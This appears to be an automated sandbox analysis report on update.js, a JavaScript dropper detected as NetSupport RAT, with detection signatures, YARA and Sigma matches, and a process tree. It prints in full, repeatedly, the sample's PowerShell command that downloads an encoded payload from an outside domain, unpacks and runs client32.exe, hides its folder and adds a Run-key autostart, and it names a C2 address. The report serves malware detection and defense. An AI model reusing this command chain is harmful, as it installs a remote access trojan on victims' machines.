
Windows Analysis Report
update.js

Overview

General Information

Sample name: update.js
Analysis ID: 1518513
MD5: 6b512b7d05171ac5d0fc13731733bc99
SHA1: 4b3457c00cbb894882da95010abd6de1b6d784a4
SHA256: 3465695bbb66e464f4aa08906f966f5fa1cf458a947c042726d529d9698b30fc

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64_ra
  • wscript.exe (PID: 3528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 3056 cmdline: "C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • wscript.exe (PID: 6612 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6700 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
Source: sslproxydump.pcap, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Strings:
  • 0x1dce1c:$b1: ::WriteAllBytes(
  • 0x1dcc9c:$b2: ::FromBase64String(
  • 0x6ab3e:$s3: Reverse
  • 0x6abc6:$s3: Reverse
  • 0x6af22:$s3: reverse
  • 0x6af78:$s3: Reverse
  • 0x6afcb:$s3: Reverse
  • 0x6b25a:$s3: reverse
  • 0x6b2b0:$s3: Reverse
  • 0x6b2cc:$s3: reverse
  • 0x6b76c:$s3: Reverse
  • 0x6b7d5:$s3: Reverse
  • 0x6ba99:$s3: Reverse
  • 0x6bb05:$s3: Reverse
  • 0x6bb85:$s3: Reverse
  • 0x6bbfe:$s3: Reverse
  • 0x6bc5e:$s3: Reverse
  • 0x6bca2:$s3: reverse
  • 0x6bdfa:$s3: Reverse
  • 0x6be63:$s3: Reverse
  • 0x6bed9:$s3: Reverse

Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dll, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security

Source: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: 0000000D.00000000.1597848713.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: 0000000A.00000002.1694167598.000001C0E609F000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security

Source: 13.2.client32.exe.74360000.5.unpack, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: 13.2.client32.exe.73de0000.4.unpack, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: 13.0.client32.exe.9f0000.0.unpack, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security
Source: 13.2.client32.exe.111b8c68.1.raw.unpack, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 13.2.client32.exe.111b8c68.1.raw.unpack, Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Author: Joe Security

Source: amsi64_3528.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Strings:
  • 0x1c44d9:$b1: ::WriteAllBytes(
  • 0x1c439f:$b2: ::FromBase64String(
  • 0x60351:$s3: Reverse
  • 0x603dc:$s3: Reverse
  • 0x6066e:$s3: reverse
  • 0x606c4:$s3: Reverse
  • 0x60717:$s3: Reverse
  • 0x609b0:$s3: reverse
  • 0x60a06:$s3: Reverse
  • 0x60a22:$s3: reverse
  • 0x60e94:$s3: Reverse
  • 0x60efe:$s3: Reverse
  • 0x6118b:$s3: Reverse
  • 0x611f8:$s3: Reverse
  • 0x6127a:$s3: Reverse
  • 0x612f4:$s3: Reverse
  • 0x61355:$s3: Reverse
  • 0x6139b:$s3: reverse
  • 0x614fa:$s3: Reverse
  • 0x61563:$s3: Reverse
  • 0x615da:$s3: Reverse

System Summary

                                barindex
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 
'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 
'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 79.141.163.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3528, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49704
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 
'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ProcessId: 3528, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WZZCVTPAZ
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6632, TargetFilename: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + 
$_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 
'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
